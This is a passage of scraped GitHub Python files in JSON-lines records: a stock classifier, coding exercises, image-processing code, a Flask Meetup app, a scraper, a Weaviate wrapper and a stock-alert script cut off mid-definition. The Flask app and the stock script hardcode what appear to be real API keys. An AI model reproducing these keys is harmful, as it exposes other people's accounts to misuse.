True:\n\n\t# Input date\n\tyear, month, day = input('Please input year,month,day (with a comma in between): \\n')\n\t# if month==1:\n\t# \tlast_year=year-1\n\t# \tlast_month=12\n\t# else:\n\t# \tlast_year=year\n\t# \tlast_month=month-1\n\t# start_day=str(last_year)+'-'+str(last_month)+'-'+str(day)\n\tend_day=str(year)+'-'+str(month)+'-'+str(day)\n\n\t# get wind data\n\twsd_data=w.wsd(\"000300.SH\", \"amt,turn,pct_chg,pe_ttm,pb,roe,yoy_tr,yoy_or,yoyprofit,close\", \"ED0M\", end_day, \"Period=M;Days=Alldays;PriceAdj=F\")\n\ttime=wsd_data.Times\n\tamt=wsd_data.Data[0]\n\tturn=wsd_data.Data[1]\n\tpct_chg=wsd_data.Data[2]\n\tpe_ttm=wsd_data.Data[3]\n\t# pb=wsd_data.Data[4]\n\t# roe=wsd_data.Data[5]\n\t# yoy_tr=wsd_data.Data[6]\n\t# yoy_or=wsd_data.Data[7]\n\t# yoyprofit=wsd_data.Data[8]\n\tclose=wsd_data.Data[9]\n\n\t# generate train data\n\tdata=[amt[0],turn[0],pct_chg[0],pe_ttm[0]]\n\ttest_data=[data]\n\tpredict_lable=model_loaded.predict(test_data)\n\tpredict_prob=model_loaded.predict_proba(test_data)\n\tif predict_lable[0]==0:\n\t\tans=\"bear\"\n\telif predict_lable[0]==1:\n\t\tans=\"vibrate\"\n\telse:\n\t\tans=\"bull\"\n\tprint(repr(time[0].year) + '-' + repr(time[0].month) + '-' + repr(time[0].day) + '\\t' + ans + '\\n' + \"Bear:\"+repr(predict_prob[0,0]) + '\\t' + \"Vibrate:\" + repr(predict_prob[0,1]) + '\\t' + \"Bull:\" + repr(predict_prob[0,2]) + '\\n')","repo_name":"Aureliu/Stock-Analysis","sub_path":"量化/广发基金/牛熊市分类/stock_bull_bear.py","file_name":"stock_bull_bear.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"39"} +{"seq_id":"25683225226","text":"#O código de César é uma das mais simples e conhecidas técnicas de criptografia. É um tipo de substituição na qual cada letra do texto é substituída por outra, que se apresenta no alfabeto abaixo dela um número fixo de vezes. Por exemplo, com uma troca de três posições, 'A' seria substituído por 'D', 'B' se tornaria 'E', e assim por diante. 
Write a program that applies this Caesar cipher (3 positions): read in a string and return the encoded string.\r\n\r\nfrase = input(\"Phrase: \").upper()\r\n\r\ncripto = \"\"\r\nfor i in frase:\r\n    if i.isalpha():\r\n        # shift by 3 within A-Z, wrapping around past 'Z'\r\n        cripto += chr((ord(i) - ord('A') + 3) % 26 + ord('A'))\r\n    else:\r\n        cripto += i\r\n\r\nprint(f\"String: {frase}\")\r\nprint(f\"Encrypted: {cripto}\")","repo_name":"marllon2004/Python-BCC","sub_path":"2° Semestre - Exercícios/lista01/ex012.py","file_name":"ex012.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"37880750309","text":"'''Given an unsorted array of integers, find the length of the longest continuous increasing subsequence and return it.\n\nA continuous increasing subsequence is determined by two indices l and r (l < r): if nums[i] < nums[i + 1] holds for every l <= i < r, then the subsequence [nums[l], nums[l + 1], ..., nums[r - 1], nums[r]] is a continuous increasing subsequence.\n\n \n\nExample 1:\n\nInput: nums = [1,3,5,4,7]\nOutput: 3\nExplanation: the longest continuous increasing subsequence is [1,3,5], with length 3.\nAlthough [1,3,5,7] is also an increasing subsequence, it is not continuous, because 5 and 7 are separated by 4 in the original array.\nExample 2:\n\nInput: nums = [2,2,2,2,2]\nOutput: 1\nExplanation: the longest continuous increasing subsequence is [2], with length 1.\n \n\nConstraints:\n\n0 <= nums.length <= 10^4\n-10^9 <= nums[i] <= 10^9\n\nSource: LeetCode (leetcode-cn)\nLink: https://leetcode-cn.com/problems/longest-continuous-increasing-subsequence\nCopyright belongs to LeetCode. Commercial reprints require official authorization; non-commercial reprints must cite the source.'''\nfrom typing import List\n\n\nclass Solution:\n    def findLengthOfLCIS(self, nums: List[int]) -> int:\n        if not nums:\n            return 0\n        ans = 1\n        a = 1\n        for i in range(1, len(nums)):\n            if nums[i] > nums[i - 1]:\n                a += 1\n            else:\n                ans = max(ans, a)\n                a = 1\n        return max(a,ans)\n","repo_name":"aa694849243/leetcode_cj","sub_path":"601-700/674. 最长连续递增序列.py","file_name":"674. 最长连续递增序列.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"5058389977","text":"from typing import Tuple\nfrom torch.utils.data import Dataset, DataLoader\nimport torchvision.transforms as T\nfrom torchvision import datasets\nimport torch\nimport numpy as np\nimport os\nfrom PIL import Image\nimport glob\nimport matplotlib.pyplot as plt\nfrom skimage.color import lab2rgb, rgb2lab, rgb2gray\nimport shutil\n\nfrom torchvision.transforms.functional import resize\n\nclass ColorizeData(Dataset):\n    def __init__(self, paths):\n        # Initialize dataset, you may use a second dataset for validation if required\n        # Use the input transform to convert images to grayscale\n        self.input_transform = T.Compose([T.Resize(size=(256,256)),\n                                          T.Grayscale(),\n                                          T.ToTensor(),\n                                          T.Normalize((0.5), (0.5))\n                                          ])\n        # Use this on target images(colorful ones)\n        self.target_transform = T.Compose([T.Resize(size=(256,256)),\n                                           T.ToTensor(),\n                                           T.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n        \n        self.paths = paths\n    \n    def __len__(self) -> int:\n        # return length of the dataset\n        return len(self.paths)\n    \n    def __getitem__(self, index: int) -> Tuple[torch.Tensor, torch.Tensor]:\n        # Return the input tensor and output tensor for training\n        input_img = Image.open(self.paths[index]).convert(\"RGB\")\n        transformed_img = self.input_transform(input_img)\n        target = self.target_transform(input_img)\n        return (transformed_img, target)\n\ndef make_dataloaders( dataset:Dataset, batch_size=16, n_workers=4, pin_memory=True):\n    dataloader = DataLoader(dataset, batch_size=batch_size, num_workers=n_workers, pin_memory=pin_memory)\n    return dataloader\n\ndef getTrainValData(directory, mode='Train'):\n    paths = glob.glob(directory + '*.jpg')\n    np.random.seed(123)\n    paths_subset = np.random.choice(paths, 4000, replace=False)\n    rand_idxs = np.random.permutation(4000)\n    train_idxs = rand_idxs[:3500]\n    
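# the fixed seed above makes this 3500/500 train/val split reproducible across runs\n    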
val_idxs = rand_idxs[3500:]\n    train_paths = paths_subset[train_idxs]\n    val_paths = paths_subset[val_idxs]\n    if(mode == 'Train'):\n        return ColorizeData(paths=train_paths)\n    elif(mode == 'Val'):\n        return ColorizeData(paths=val_paths)\n\n\nclass AverageMeter(object):\n    '''A handy class from the PyTorch ImageNet tutorial''' \n    def __init__(self):\n        self.reset()\n    def reset(self):\n        self.val, self.avg, self.sum, self.count = 0, 0, 0, 0\n    def update(self, val, n=1):\n        self.val = val\n        self.sum += val * n\n        self.count += n\n        self.avg = self.sum / self.count\n\ndef visualize_image(grayscale_input, ab_input=None, show_image=False, save_path=None, save_name=None):\n    '''Show or save image given grayscale (and ab color) inputs. Input save_path in the form {'grayscale': '/path/', 'colorized': '/path/'}'''\n    plt.clf() # clear matplotlib plot\n    if ab_input is not None:\n        ab_input = ab_input.cpu()  # only move the ab channels to the CPU when they were supplied\n    grayscale_input = grayscale_input.cpu()  \n    if ab_input is None:\n        grayscale_input = grayscale_input.squeeze().numpy()  \n        if save_path is not None and save_name is not None: \n            plt.imsave(fname='{}.{}'.format(save_path['grayscale'], save_name), arr=grayscale_input, cmap='gray')\n        if show_image: \n            plt.imshow(grayscale_input, cmap='gray')\n            plt.show()\n    else:\n        ab_input[0] = grayscale_input[0]\n        color_image = ab_input.numpy()\n        color_image = color_image.transpose((1, 2, 0))  \n        color_image[:, :, 0:1] = color_image[:, :, 0:1] * 100\n        color_image[:, :, 1:3] = color_image[:, :, 1:3] * 255 - 128  \n        color_image = lab2rgb(color_image.astype(np.float64))\n        grayscale_input = grayscale_input.squeeze().numpy()\n        if save_path is not None and save_name is not None:\n            plt.imsave(arr=grayscale_input, fname='{}{}'.format(save_path['grayscale'], save_name), cmap='gray')\n            plt.imsave(arr=color_image, fname='{}{}'.format(save_path['colorized'], save_name))\n        if show_image: \n            f, axarr = plt.subplots(1, 2)\n            axarr[0].imshow(grayscale_input, cmap='gray')\n            axarr[1].imshow(color_image)\n            plt.show()\n\ndef save_checkpoint(state, is_best_so_far, filename='checkpoints/checkpoint.pth.tar'):\n    '''Saves checkpoint, and replaces the old best model if the current model is better'''\n    torch.save(state, filename)\n    if is_best_so_far:\n        shutil.copyfile(filename, 'checkpoints/model_best.pth.tar')\n\n# train_dl = make_dataloaders(paths=train_paths)\n# val_dl = make_dataloaders(paths=val_paths)","repo_name":"kushagraagrawal/Image_Colorization_pyTorch","sub_path":"image-colorization_d6a566/colorize_data.py","file_name":"colorize_data.py","file_ext":"py","file_size_in_byte":4703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"32184355198","text":"from flask import Flask, render_template, request\nfrom flask_debugtoolbar import DebugToolbarExtension\n\napp = Flask(__name__)\napp.debug = True\nimport meetup.api\napp.config['SECRET_KEY'] = 'foobar'\n\ntoolbar = DebugToolbarExtension(app)\n\ndef get_names():\n    client = meetup.api.Client(\"3f6d3275d3b6314e73453c4aa27\")\n\n    rsvps=client.GetRsvps(event_id='235484841', urlname='_ChiPy_')\n    member_id = ','.join([str(i['member']['member_id']) for i in rsvps.results])\n    members = client.GetMembers(member_id=member_id)\n\n    foo={}\n    for member in members.results:\n        try:\n            foo[member['name']] = member['photo']['thumb_link']\n        except:\n            pass # ignore those who do not have a complete profile\n    return foo\n\nmember_rsvps=get_names()\n\n@app.route('/rsvps')\ndef rsvps():\n    return render_template('rsvps.html', rsvps=member_rsvps)\n\n\n@app.route('/teams', methods=['GET', 'POST'])\ndef 
teams():\n    results = request.form.to_dict()\n    return render_template('teams.html', teams=[results])\n\nif __name__ == '__main__':\n    app.run(debug=True)\n","repo_name":"chicagopython/CodingWorkshops","sub_path":"problems/webdev/flask_team_project/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"39"} +{"seq_id":"2241287387","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\nimport csv\r\nimport time\r\n\r\narti_link = []\r\narti_title = []\r\nwhile True:\r\n    # fetch a fresh copy of the page on every pass so newly published articles are picked up\r\n    req = requests.get('https://www.elwatan.com/category/edition/actualite')\r\n    soup = BeautifulSoup(req.text,'html.parser')\r\n    main = soup.find('div',class_='posts')\r\n    atag = main.find_all('h3',class_='title-14')\r\n    for i in atag:\r\n        link = (i.find('a')['href'])\r\n        title = (i.text).strip()\r\n        if title not in arti_title:\r\n            arti_title.append(title)\r\n        if link not in arti_link:\r\n            arti_link.append(link)\r\n            print(title)\r\n            print(link)\r\n            print()\r\n    l = 0\r\n    #CSV part\r\n    with open('elwaten.csv','w',newline='') as l1:\r\n        fieldnames = ['Article_Titles','Article_links']\r\n        thewriter = csv.DictWriter(l1,fieldnames=fieldnames)\r\n\r\n        thewriter.writeheader()\r\n        for i in arti_title:\r\n            thewriter.writerow({'Article_Titles':i,'Article_links':arti_link[l]})\r\n            l+=1\r\n    time.sleep(180)\r\n    \r\n\r\n\r\n\r\n    \r\n    ","repo_name":"KArimCHidekh/WebScraping-App-and-Maching-Learing","sub_path":"Real_time_Scraping/elwaten_realtime.py","file_name":"elwaten_realtime.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"16075712682","text":"from __future__ import division\nfrom pylab import *\nfrom sklearn import datasets, svm\nimport numpy\n\ndict = datasets.load_digits()\n\ndescr = dict['DESCR']\ndata = dict['data']\nimg = dict['images']\ntar = dict['target']\ntarget_names = dict['target_names']\n\ndef fromSKLearn():\n    dict = datasets.load_digits()\n\n    descr = dict['DESCR']\n    data = dict['data']\n    img = dict['images']\n    tar = dict['target']\n    target_names = dict['target_names']\n\n    # they're the proper digits\n    show = data.reshape(1797, 8, 8)\n\n    # now, we have to figure out each number.\n    # x is our data\n    # w, the weights\n    # so, s = w_1*x_1 ... 
w_n * x_n\n # y = dot(x^T, s)\n # \n\n clf = svm.SVC()#gamma=1e-5)\n clf.fit(data, tar)\n pred = clf.predict(data)\n\n # it's only wrong 0.1% of the time\n error = abs(pred - tar)\n\n\n# w_1 = \\arg \\max_{||w=1||} Var(x^T w)\n\n# multiply x by the w's\nx = data[0]\nw = rand(x.shape[0], x.shape[0])\n\nx = asmatrix(x)\nw = asmatrix(w)\na = x * w.T\n\n\n\n\n","repo_name":"stsievert/side-projects","sub_path":"dimension_reduction/dimension_reduction.py","file_name":"dimension_reduction.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"6888047118","text":"import os\nfrom typing import List\n\nfrom evadb.third_party.vector_stores.types import (\n FeaturePayload,\n VectorIndexQuery,\n VectorIndexQueryResult,\n VectorStore,\n)\nfrom evadb.utils.generic_utils import try_to_import_weaviate_client\n\nrequired_params = []\n_weaviate_init_done = False\n\n\nclass WeaviateVectorStore(VectorStore):\n def __init__(self, collection_name: str, **kwargs) -> None:\n try_to_import_weaviate_client()\n global _weaviate_init_done\n\n self._collection_name = collection_name\n\n # Get the API key.\n self._api_key = kwargs.get(\"WEAVIATE_API_KEY\")\n\n if not self._api_key:\n self._api_key = os.environ.get(\"WEAVIATE_API_KEY\")\n\n assert (\n self._api_key\n ), \"Please set your `WEAVIATE_API_KEY` using set command or environment variable (WEAVIATE_API_KEY). It can be found at the Details tab in WCS Dashboard.\"\n\n # Get the API Url.\n self._api_url = kwargs.get(\"WEAVIATE_API_URL\")\n\n if not self._api_url:\n self._api_url = os.environ.get(\"WEAVIATE_API_URL\")\n\n assert (\n self._api_url\n ), \"Please set your `WEAVIATE_API_URL` using set command or environment variable (WEAVIATE_API_URL). 
It can be found at the Details tab in WCS Dashboard.\"\n\n if not _weaviate_init_done:\n # Initialize weaviate client\n import weaviate\n\n client = weaviate.Client(\n url=self._api_url,\n auth_client_secret=weaviate.AuthApiKey(api_key=self._api_key),\n )\n client.schema.get()\n\n _weaviate_init_done = True\n\n self._client = client\n\n def create(\n self,\n vectorizer: str = \"text2vec-openai\",\n properties: list = None,\n module_config: dict = None,\n ):\n properties = properties or []\n module_config = module_config or {}\n\n collection_obj = {\n \"class\": self._collection_name,\n \"properties\": properties,\n \"vectorizer\": vectorizer,\n \"moduleConfig\": module_config,\n }\n\n if self._client.schema.exists(self._collection_name):\n self._client.schema.delete_class(self._collection_name)\n\n self._client.schema.create_class(collection_obj)\n\n def add(self, payload: List[FeaturePayload]) -> None:\n with self._client.batch as batch:\n for item in payload:\n data_object = {\"id\": item.id, \"vector\": item.embedding}\n batch.add_data_object(data_object, self._collection_name)\n\n def delete(self) -> None:\n self._client.schema.delete_class(self._collection_name)\n\n def query(self, query: VectorIndexQuery) -> VectorIndexQueryResult:\n response = (\n self._client.query.get(self._collection_name, [\"*\"])\n .with_near_vector({\"vector\": query.embedding})\n .with_limit(query.top_k)\n .do()\n )\n\n data = response.get(\"data\", {})\n results = data.get(\"Get\", {}).get(self._collection_name, [])\n\n similarities = [item[\"_additional\"][\"distance\"] for item in results]\n ids = [item[\"id\"] for item in results]\n\n return VectorIndexQueryResult(similarities, ids)\n","repo_name":"georgia-tech-db/evadb","sub_path":"evadb/third_party/vector_stores/weaviate.py","file_name":"weaviate.py","file_ext":"py","file_size_in_byte":3243,"program_lang":"python","lang":"en","doc_type":"code","stars":2438,"dataset":"github-code","pt":"39"} +{"seq_id":"28473075241","text":"\"\"\"\nThis code is based on the principles outlined in:\n\nJ Portilla and E P Simoncelli A Parametric Texture Model based on Joint Statistics of Complex Wavelet Coefficients Int'l\nJournal of Computer Vision. 
October, 2000.\n\nA more concise background is available at: https://www.cns.nyu.edu/~eero/steerpyr/\n\nThe code in this file is an adaptation of the code in the following repo:\n\nhttps://github.com/LabForComputationalVision/matlabPyrTools\n\nWhere possible, variable names have been preserved for easy comparison with this toolbox\n\n\"\"\"\n\nfrom __future__ import division\n\nfrom scipy.interpolate import interp1d\nfrom scipy.misc import factorial\nimport matplotlib.pyplot as plt\nfrom copy import copy\nimport numpy as np\nimport cv2\n\nLOW_MASK = 1\nHI_MASK = 2\nBAND1 = 1\nBAND2 = 2\n\nLEVEL_1_IDX = 0\n\n\nclass Scy_pyr_builder_base(object):\n\n    def __init__(self,\n                 im_h,\n                 im_w,\n                 levels=5,\n                 nbands=2,\n                 twidth=1,\n                 real_data_dtypes=np.float32,\n                 complex_data_dtype=np.csingle,\n                 ):\n\n        self.im_h = im_h\n        self.im_w = im_w\n        self.dims_pyr_top_level = np.array((self.im_h, self.im_w))\n        self.twidth = twidth\n        self.complex_data_dtype = complex_data_dtype\n        self.real_data_dtypes = real_data_dtypes\n\n        self.levels = levels\n        self.nbands = nbands\n        self.order = self.nbands - 1\n\n        self.lev_h = np.zeros(self.levels + 2, dtype=np.int)\n        self.lev_w = np.zeros_like(self.lev_h, dtype=np.int)\n\n        self.lev_h[0] = self.im_h\n        self.lev_w[0] = self.im_w\n\n        ###############################################################################\n        # Preallocate memory for filter masks\n\n        # recursively calculate the dimensions of each level\n        for level in range(self.levels + 1):\n            self.lev_h[level + 1] = np.int(np.ceil(self.lev_h[level] / 2.0))\n            self.lev_w[level + 1] = np.int(np.ceil(self.lev_w[level] / 2.0))\n\n        # print('lev_h', self.lev_h)\n        # print('lev_w', self.lev_w)\n\n        self.lostart = np.zeros((self.levels, 2))\n        self.loend = np.zeros((self.levels, 2))\n\n        # high_mask is a list of length \"levels\" with one high-pass filter mask per level\n        self.high_mask = [None] * self.levels\n        self.lo_mask = [None] * self.levels\n        self.angle_mask = [[None for i in range(self.nbands)] for j in range(self.levels)]\n        # print self.angle_mask\n        # print len(self.angle_mask)\n        self.lodft = [None] * self.levels\n        self.coefficients = [None] * self.nbands\n\n        for level in range(self.levels):\n            # print level\n            self.high_mask[level] = np.zeros((self.lev_h[level], self.lev_w[level]), dtype=self.real_data_dtypes)\n\n        # lo mask on the first level\n        self.lo0mask = np.zeros((self.lev_h[LEVEL_1_IDX], self.lev_w[LEVEL_1_IDX]), dtype=self.real_data_dtypes)\n\n        # lo mask on subsequent levels\n        for level in range(self.levels):\n            self.lo_mask[level] = np.zeros((self.lev_h[level + 1], self.lev_w[level + 1]),\n                                           dtype=self.real_data_dtypes)\n\n        # bandpass filter array\n        for level in range(self.levels):\n            for band in range(self.nbands):\n                self.angle_mask[level][band] = np.zeros((self.lev_h[level], self.lev_w[level]),\n                                                        dtype=self.real_data_dtypes)\n\n        # lo dft array\n        for level in range(self.levels):\n            self.lodft[level] = np.zeros((self.lev_h[level], self.lev_w[level]), dtype=self.complex_data_dtype)\n        for band in range(self.nbands):\n            self.coefficients[band] = np.zeros((self.lev_h[self.levels], self.lev_w[self.levels]),\n                                               dtype=self.real_data_dtypes)\n\n    @property\n    def i(self):\n        \"\"\" returns the unit imaginary number \"\"\"\n        return np.complex(0, 1)\n\n    @property\n    def lowest_level_dim(self):\n        return np.array((self.lev_h[self.levels-1], self.lev_w[self.levels-1]))\n\n    def build_scf(self, im):\n        \"\"\"\n        Decompose an image using the preallocated filter masks\n\n        :param im: 2-D image array to decompose\n        :return: list of complex band coefficients, one array per orientation band\n        \"\"\"\n        # process the 
top layer filters\n imdft = np.fft.fftshift(np.fft.fft2(im).astype(self.complex_data_dtype))\n self.lodft[0][:, :] = (imdft * self.lo0mask).astype(self.complex_data_dtype)\n\n for level in range(self.levels):\n # if in lowest level\n\n if level == self.levels-1:\n this_band_dft = [None] * self.nbands\n for band in range(self.nbands):\n this_band_dft[band] = (np.power(self.i, (self.nbands-1))) * self.lodft[level] * self.angle_mask[level][band] * self.high_mask[level]\n self.coefficients[band] = np.fft.ifft2(np.fft.ifftshift(this_band_dft[band]).astype(self.complex_data_dtype))\n # print '####### Debug pyramid decomposition ########'\n # print level\n # print np.shape(this_band_dft[band])\n # Exit when the lowest level is reached and return these bands\n return self.coefficients\n\n lo_temp = self.lodft[level][self.lostart[level, 0]:self.loend[level, 0]+1,\n self.lostart[level, 1]:self.loend[level, 1]+1]\n # print '####### Debug pyramid decomposition ########'\n # print level\n # print np.shape(self.lodft[level + 1])\n # print np.shape(lo_temp)\n # print np.shape(self.lo_mask[level])\n self.lodft[level+1][:, :] = lo_temp * self.lo_mask[level]\n\n def plot_lo_masks(self):\n \"\"\"\n plots the low pass filter masks that are used in polar Fourier space\n :return:\n \"\"\"\n\n qty = len(self.lo_mask)\n ax = [None] * qty\n\n fig, axs = plt.subplots(qty)\n\n for idx in range(qty):\n ax[idx] = axs[idx].matshow(self.lo_mask[idx])\n\n plt.show()\n\n def plot_high_masks(self):\n \"\"\"\n plots the high pass filter masks that are used in polar Fourier space\n :return:\n \"\"\"\n qty = len(self.high_mask)\n ax = [None] * qty\n\n fig, axs = plt.subplots(qty)\n\n for idx in range(qty):\n ax[idx] = axs[idx].matshow(self.high_mask[idx])\n\n plt.show()\n\n def plot_angle_masks_b1(self):\n \"\"\"\n plots the first orientation of band pass filter masks that are used in polar Fourier space\n :return:\n \"\"\"\n ax = [None] * self.levels\n\n fig, axs = plt.subplots(self.levels)\n\n for idx in range(self.levels):\n ax[idx] = axs[idx].matshow(self.angle_mask[idx][0])\n\n plt.show()\n\n\nclass Steerable_complex_wavelet_pyramid(Scy_pyr_builder_base):\n\n def __init__(self,\n im_h,\n im_w,\n levels=5,\n nbands=2,\n ):\n\n super(Steerable_complex_wavelet_pyramid, self).__init__(im_h=im_h, im_w=im_w, levels=levels, nbands=nbands)\n\n self.generate_radial_transition_function()\n self.preprocess_masks()\n\n def preprocess_masks(self):\n \"\"\"\n Preallocates filter masks once at initialisation time to save time for each image decomposition.\n This is a recursive process.\n :return:\n \"\"\"\n # collect object vals that will be used recursively in this function\n this_log_rad = copy(self.log_rad)\n this_angle = copy(self.angle)\n\n for level in range(self.levels):\n\n self.high_mask[level] = self.point_op(this_log_rad, self.Yrcos, self.Xrcos_low[level], self.delta_Xrcos)\n for band in range(self.nbands):\n self.angle_mask[level][band] = self.point_op(this_angle, self.Ycosn,\n self.Xcosn[0] + np.pi * (band) / self.nbands,\n self.Xcosn[1] - self.Xcosn[0])\n\n this_im_dims = np.array((self.lev_h[level], self.lev_w[level]))\n\n ctr = np.ceil((this_im_dims + 0.5) / 2.0)\n lodims = np.ceil((this_im_dims - 0.5) / 2.0)\n loctr = np.ceil((lodims + 0.5) / 2.0)\n self.lostart[level, :] = ctr - loctr # + 1 - 1\n self.loend[level, :] = self.lostart[level, :] + lodims - 1\n\n self.lostart = self.lostart.astype(np.int)\n self.loend = self.loend.astype(np.int)\n\n low_slice = slice(self.lostart[level, 0], self.loend[level, 0]+1, 1)\n 
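# these slices crop the polar-frequency grids to their centre region, which becomes the grid for the next (half-size) level\n            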
hi_slice = slice(self.lostart[level, 1], self.loend[level, 1]+1, 1)\n\n this_log_rad = this_log_rad[low_slice, hi_slice]\n this_angle = this_angle[low_slice, hi_slice]\n self.lo_mask[level] = self.point_op(this_log_rad, self.YIrcos, self.Xrcos_low[level], self.delta_Xrcos)\n\n def point_op(self, data, Y, x, x_delta):\n \"\"\"\n Performs the \"Point operation function\" (PointOp) from Simoncelli's toolbox. Note, we don't use the optimised\n C-code because we only perform this once at initialisation time\n :param data: image\n :param Y: look up table\n :param x: origin\n :param x_delta: increment\n :return: image data linearly interpolated to new range\n \"\"\"\n X = x + x_delta * np.arange(np.shape(Y)[0])\n f = interp1d(X, Y, fill_value=\"extrapolate\")\n return np.reshape(f(data.ravel()), np.shape(data))\n\n def generate_radial_transition_function(self, lutsize=1024):\n \"\"\"\n :param lutsize:\n :param plot_filters:\n :return:\n \"\"\"\n ctr_x = np.int(np.floor((self.im_h) / 2.0))\n ctr_y = np.int(np.floor((self.im_w) / 2.0))\n xramp, yramp = np.meshgrid((np.arange(self.im_w)-ctr_y) / (self.im_w/2.0), (np.arange(self.im_h) - ctr_x) / (self.im_h / 2.0))\n self.angle = np.arctan2(yramp, xramp)\n self.log_rad = np.linalg.norm( np.dstack((xramp, yramp)), axis=2) # np.linalg.norm((xramp, yramp))\n self.log_rad[ctr_x, ctr_y] = self.log_rad[ctr_x, ctr_y -1]\n self.log_rad = np.log2(self.log_rad)\n\n # Radial transition function(a raised cosine in log-frequency):\n [self.Xrcos, self.Yrcos] = self.rcosFn(self.twidth, (-self.twidth / 2.0), (0, 1))\n self.delta_Xrcos = self.Xrcos[1] - self.Xrcos[0]\n\n self.Xrcos_low = np.zeros(self.levels)\n self.Xrcos_hi = np.zeros_like(self.Xrcos_low)\n\n decrement = np.log2(2)\n self.Xrcos_low[0] = self.Xrcos[0] - decrement\n self.Xrcos_hi[0] = self.Xrcos[1] - decrement\n for idx in range(1, self.levels):\n self.Xrcos_low[idx] = self.Xrcos_low[idx - 1] - decrement\n self.Xrcos_hi[idx] = self.Xrcos_hi[idx - 1] - decrement\n\n self.Yrcos = np.sqrt(self.Yrcos)\n self.YIrcos = np.abs(np.sqrt(1.0 - np.square(self.Yrcos)))\n\n self.lo0mask = self.point_op(self.log_rad, self.YIrcos, self.Xrcos[0], self.delta_Xrcos)\n\n self.Xcosn = np.pi * ( np.arange(-2*lutsize-1, lutsize+2, 1) ) / lutsize # [-2 * pi:pi]\n self.alfa = ( (np.pi + self.Xcosn) % (2 * np.pi) ) - np.pi\n self.const = (np.power((2*self.order),2)) * ( np.square(factorial(self.order, exact=True)) ) / (self.nbands * factorial(2 * self.order, exact=True))\n\n self.Ycosn = 2 * np.sqrt(self.const) * ( np.power(np.cos(self.Xcosn), self.order)) * (np.abs(self.alfa) < np.pi / 2)\n\n def rcosFn(self, width=1, position=1.0, values=np.array((0,1))):\n '''Return a lookup table containing a \"raised cosine\" soft threshold function\n Y = VALUES(1) + (VALUES(2)-VALUES(1)) * cos^2( PI/2 * (X - POSITION + WIDTH)/WIDTH )\n this lookup table is suitable for use by `pointOp`\n Arguments\n ---------\n width : `float`\n the width of the region over which the transition occurs\n position : `float`\n the location of the center of the threshold\n values : `tuple`\n 2-tuple specifying the values to the left and right of the transition.\n Returns\n -------\n X : `np.array`\n the x values of this raised cosine\n Y : `np.array`\n the y values of this raised cosine\n '''\n sz = 256 # arbitrary!\n X = np.pi * np.arange(-sz - 1, 2) / (2 * sz)\n Y = values[0] + (values[1] - values[0]) * np.cos(X) ** 2\n # make sure end values are repeated, for extrapolation...\n Y[0] = Y[1]\n Y[sz + 2] = Y[sz + 1]\n X = position + (2 * width / np.pi) * (X 
+ np.pi / 4)\n        return X, Y\n\n\ndef speed_test(repeats=1000):\n\n    from time import time\n    from definitions_cwssim import IM_SEQUENCES\n    from os import path\n\n    p_build = Steerable_complex_wavelet_pyramid(im_h=150, im_w=235)\n    im = cv2.imread(path.join(IM_SEQUENCES, 'fwd_drone', 'fwd_drone_1.jpg'), 0)\n\n    t_start = time()\n    print ('performing speed test with {} repeats'.format(repeats))\n    for idx in range(repeats):\n        coefficients = p_build.build_scf(im)\n    t_end = time()\n    t_mean = (t_end - t_start) / repeats\n    print ('mean processing time was {}s'.format(t_mean))\n\n\ndef plot_masks(im_h=150, im_w=235):\n    \"\"\"\n    Plots the preallocated masks of the steerable pyramid\n    :param im_h: image height in pixels\n    :param im_w: image width in pixels\n    :return:\n    \"\"\"\n    py = Steerable_complex_wavelet_pyramid(im_h=im_h, im_w=im_w)\n\n    py.plot_lo_masks()\n    py.plot_high_masks()\n    py.plot_angle_masks_b1()\n\n\nif __name__ == '__main__':\n\n    # run some diagnostic tests\n    speed_test()\n    plot_masks(im_h=150, im_w=235)\n","repo_name":"jannsta1/torf","sub_path":"src/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":13771,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"5242396734","text":"def solution(A):\n    len_a = len(A)\n    Dict = {}\n    for index in range(len_a):\n        if A[index] in Dict:\n            del Dict[A[index]]\n        else:\n            Dict[A[index]] = 1\n    for key in Dict.keys():\n        return key","repo_name":"nullbyte91/codility-python","sub_path":"3.oddOccurrencesInArray.py","file_name":"3.oddOccurrencesInArray.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"24665581994","text":"import numpy as np\nimport cv2 as cv\n\n# an image -> represented here as a 3*3 array, each pixel stored as an 8-bit value\nimg = np.zeros((3, 3), dtype=np.uint8)\nprint(img)\n# each pixel is now an array of three values [B,G,R]\nimg = cv.cvtColor(img, cv.COLOR_GRAY2BGR)\nprint(img)\n# convert the image format; imread() drops the alpha channel\nimage = cv.imread('logo.png', cv.IMREAD_GRAYSCALE)\n# bmp bitmaps require 8-bit channels; png requires 8- or 16-bit channels\ncv.imwrite('logo_gray.png', image)\n\n# block operations\nimg = cv.imread('logo.png')\n","repo_name":"sunleisan/opencv","sub_path":"basic/opencv_conputer_version/chapter2.py","file_name":"chapter2.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"39163942243","text":"import requests\nfrom twilio.rest import Client\n\nSTOCK_NAME = \"TSLA\"\nCOMPANY_NAME = \"Tesla Inc\"\nSTOCK_PRICE_API = \"EJXOEH3J2VREIOPP\"\nNEWS_API_KEY = \"5e12146bb6ed488adbbd58556e633383\"\n\nSTOCK_ENDPOINT = 